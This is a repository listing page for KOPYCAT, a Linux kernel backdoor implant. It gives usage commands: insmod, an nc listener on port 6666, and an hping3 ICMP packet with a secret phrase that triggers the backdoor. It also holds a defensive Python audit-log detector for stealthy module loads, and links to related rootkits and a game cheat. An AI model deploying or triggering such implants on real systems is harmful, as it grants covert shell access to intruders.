Linux Kernel module-less implant (backdoor)

KOPYCAT - Linux Kernel module-less implant (backdoor)

Usage

$ make
$ sudo insmod kopycat.ko
insmod: ERROR: could not insert module kopycat.ko: Inappropriate ioctl for device
$ lsmod | grep kopycat
$ cat /proc/modules | grep kopycat

Launch nc listener:

$ nc -l 6666

Trigger the backdoor by sending ICMP packet with secret phrase:

$ sudo hping3 -c 1 -j -1 -e black-wives-are-fatter 127.0.0.1
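
A defender's view of the insmod step above, as an added example (not part of the kopycat project): the load fails with ENOTTY and nothing shows up in lsmod, but a module's init function has already run in kernel context by the time the error is returned, so a failed load with an unusual errno is worth an alert. The audit records are constructed and assume x86_64 with an auditd rule such as `-a always,exit -F arch=b64 -S init_module,finit_module -k modules`; the set of expected error codes is an assumed baseline.

```python
import re

# x86_64 syscall numbers of the two module-loading syscalls.
MODULE_SYSCALLS = {"175": "init_module", "313": "finit_module"}
# Linux errno values; audit logs record them as a negative exit= field.
ERRNO = {1: "EPERM", 2: "ENOENT", 8: "ENOEXEC", 12: "ENOMEM", 16: "EBUSY",
         17: "EEXIST", 22: "EINVAL", 25: "ENOTTY", 126: "ENOKEY",
         129: "EKEYREJECTED"}
# Assumed baseline of errors an ordinary failed load produces (tune locally).
# ENOTTY, the error in the usage above, is deliberately not in it.
EXPECTED = {1, 2, 8, 12, 16, 17, 22, 126, 129}

FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')
EVENT = re.compile(r"audit\(([\d.]+):(\d+)\)")

# Constructed sample records (not captured from a real host).
SAMPLE = [
    'type=SYSCALL msg=audit(1627300000.101:411): arch=c000003e syscall=313 success=yes exit=0 pid=1201 uid=0 comm="modprobe" exe="/usr/bin/kmod" key="modules"',
    'type=SYSCALL msg=audit(1627300050.220:412): arch=c000003e syscall=313 success=no exit=-17 pid=1302 uid=0 comm="insmod" exe="/usr/bin/kmod" key="modules"',
    'type=SYSCALL msg=audit(1627300100.330:413): arch=c000003e syscall=313 success=no exit=-25 pid=1403 uid=0 comm="insmod" exe="/usr/bin/kmod" key="modules"',
    'type=SYSCALL msg=audit(1627300150.440:414): arch=c000003e syscall=59 success=yes exit=0 pid=1504 uid=1000 comm="ls" exe="/usr/bin/ls" key="exec"',
]

def suspicious_module_loads(lines):
    """Return failed module-load syscalls whose errno is outside EXPECTED."""
    findings = []
    for line in lines:
        f = {k: v.strip('"') for k, v in FIELD.findall(line)}
        if f.get("type") != "SYSCALL" or f.get("arch") != "c000003e":
            continue
        call = MODULE_SYSCALLS.get(f.get("syscall"))
        if call is None or f.get("success") != "no":
            continue
        err = -int(f["exit"])
        if err in EXPECTED:
            continue  # ordinary failure (already loaded, bad format, ...)
        ts, event_id = EVENT.search(f["msg"]).groups()
        findings.append({"event": event_id, "time": float(ts), "syscall": call,
                         "errno": ERRNO.get(err, str(err)),
                         "comm": f.get("comm"), "uid": f.get("uid")})
    return findings

if __name__ == "__main__":
    for hit in suspicious_module_loads(SAMPLE):
        print("ALERT failed module load with unusual errno:", hit)
```

Because the module list stays empty after such a load, the audit trail of the syscall itself is the record to keep and forward off-host.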

Author

Ilya V. Matveychikov

2021

Owner
Ilya V. Matveychikov
Linux kernel addict, security researcher, reverse engineer
A LKM rootkit targeting 4.x and 5.x kernel versions which opens a backdoor that can be used to spawn a reverse shell to a remote host and more.

Umbra Umbra (/ˈʌmbrə/) is an experimental LKM rootkit for kernels 4.x and 5.x (up to 5.7) which opens a network backdoor that spawns reverse shells to

Marcos S. Bajo 83 Jul 26, 2022
featured cs:go internal hack, one file and less than 1000 lines.

singlefile This is a featured CS:GO internal cheat written in less than 1000 lines, and in one C++ file. I encourage you to submit feature suggestions

null 47 Jun 29, 2022
An asynchronous directory file change watcher module for Windows, macOS and Linux wrapped for V

A V module for asynchronously watching for file changes in a directory. The module is essentially a wrapper for septag/dmon. It works for Windows, macOS and Linux.

null 16 Jul 29, 2022
Locate the current executable and the current module/library on the file system

Where Am I? A drop-in two files library to locate the current executable and the current module on the file system. Supported platforms: Windows Linux

Gregory Pakosz 366 Aug 7, 2022
Modify Android linker to provide loading module and hook function

fake-linker Chinese document click here Project description Modify Android linker to provide loading module and plt hook features.Please check the det

sanfengAndroid 194 Jul 19, 2022
[WIP] A Riru module tries to enable Magisk hide for isolated processes.

Riru-IsolatedMagiskHider Background Many applications now detect Magisk for security, Magisk provided "Magisk Hide" to prevent detection, but isolated

残页 509 Aug 5, 2022
Documenting the development of a simple first module.

Your First Module This guide will look at writing a complete module, with many common features in a reduced form. This includes the module initialisat

Open Multiplayer 16 Jun 3, 2021
Simple and lightweight pathname parser for C. This module helps to parse dirname, basename, filename and file extension .

Path Module For C File name and extension parsing functionality are removed because it's difficult to distinguish between a hidden dir (ex: .git) and

Prajwal Chapagain 3 Feb 25, 2022
zsh module for automatically compiling sourced files

Zinit Module Motivation The module is a binary Zsh module (think about zmodload Zsh command, it's that topic) which transparently and automatically co

zdharma-continuum 10 Jul 8, 2022
Python module to reduce a cmake file to an AST

CMake AST Status Travis CI (Ubuntu) AppVeyor (Windows) Coverage PyPI Licence cmake-ast has been tested against every single CMake module that ships wi

ポリ平方 POLYSQUARE 27 May 11, 2022
UClamp backports and custom tunings for different kernel versions/devices

Linux kernel ============ This file was moved to Documentation/admin-guide/README.rst Please notice that there are several guides for kernel develop

null 25 Jan 14, 2022
A WIP "Vulnerable by Design" kext for iOS/macOS to play & learn *OS kernel exploitation

Vulnerable Kext A WIP (work-in progress) "Vulnerable by Design" kext for iOS/macOS to play/learn with *OS kernel exploitation Usage Documentation can

Chaithu 218 Jul 16, 2022
This project aims to facilitate debugging a kernel driver in windows by adding support for a code change on the fly without reboot/unload, and more!

BSOD Survivor Tired of always telling yourself when you got a BSOD that what if I could just return to the caller function which caused the BSOD, and

Ido Westler 147 Aug 3, 2022
Windows kernel hacking framework, driver template, hypervisor and API written on C++

Windows kernel hacking framework, driver template, hypervisor and API written on C++

Александр 1.2k Aug 12, 2022
Quick check of NT kernel exported&unexported functions/global variable offset

Quick check of NT kernel exported&unexported functions/global variable offset. Completed offsets are in the System directory and can be looked up online. There are already comple

不想加班劉 65 Jun 12, 2022
A simple Windows kernel rootkit.

Venom RootKit A simple Windows rootkit that I have written in order to explore a bit about the world of rootkits and the Windows kernel in general. The Ven

Amit Schendel 58 Jul 22, 2022
the checkra1n set of tools targeting bare metal, Linux and Windows

Universal toolchain Low-effort cross-compiling for the masses. What's Universal toolchain? It's a collection of sysroots and shell scripts in such a w

null 62 May 27, 2022
Orbit, the Open Runtime Binary Instrumentation Tool, is a standalone C/C++ profiler for Windows and Linux

Orbit, the Open Runtime Binary Instrumentation Tool, is a standalone C/C++ profiler for Windows and Linux. Its main purpose is to help developers visualize the execution flow of a complex application.

Google 2.7k Jul 31, 2022
Atomically exchange two files in Linux

Atomically exchange two files in Linux.

David Pape 9 Aug 4, 2022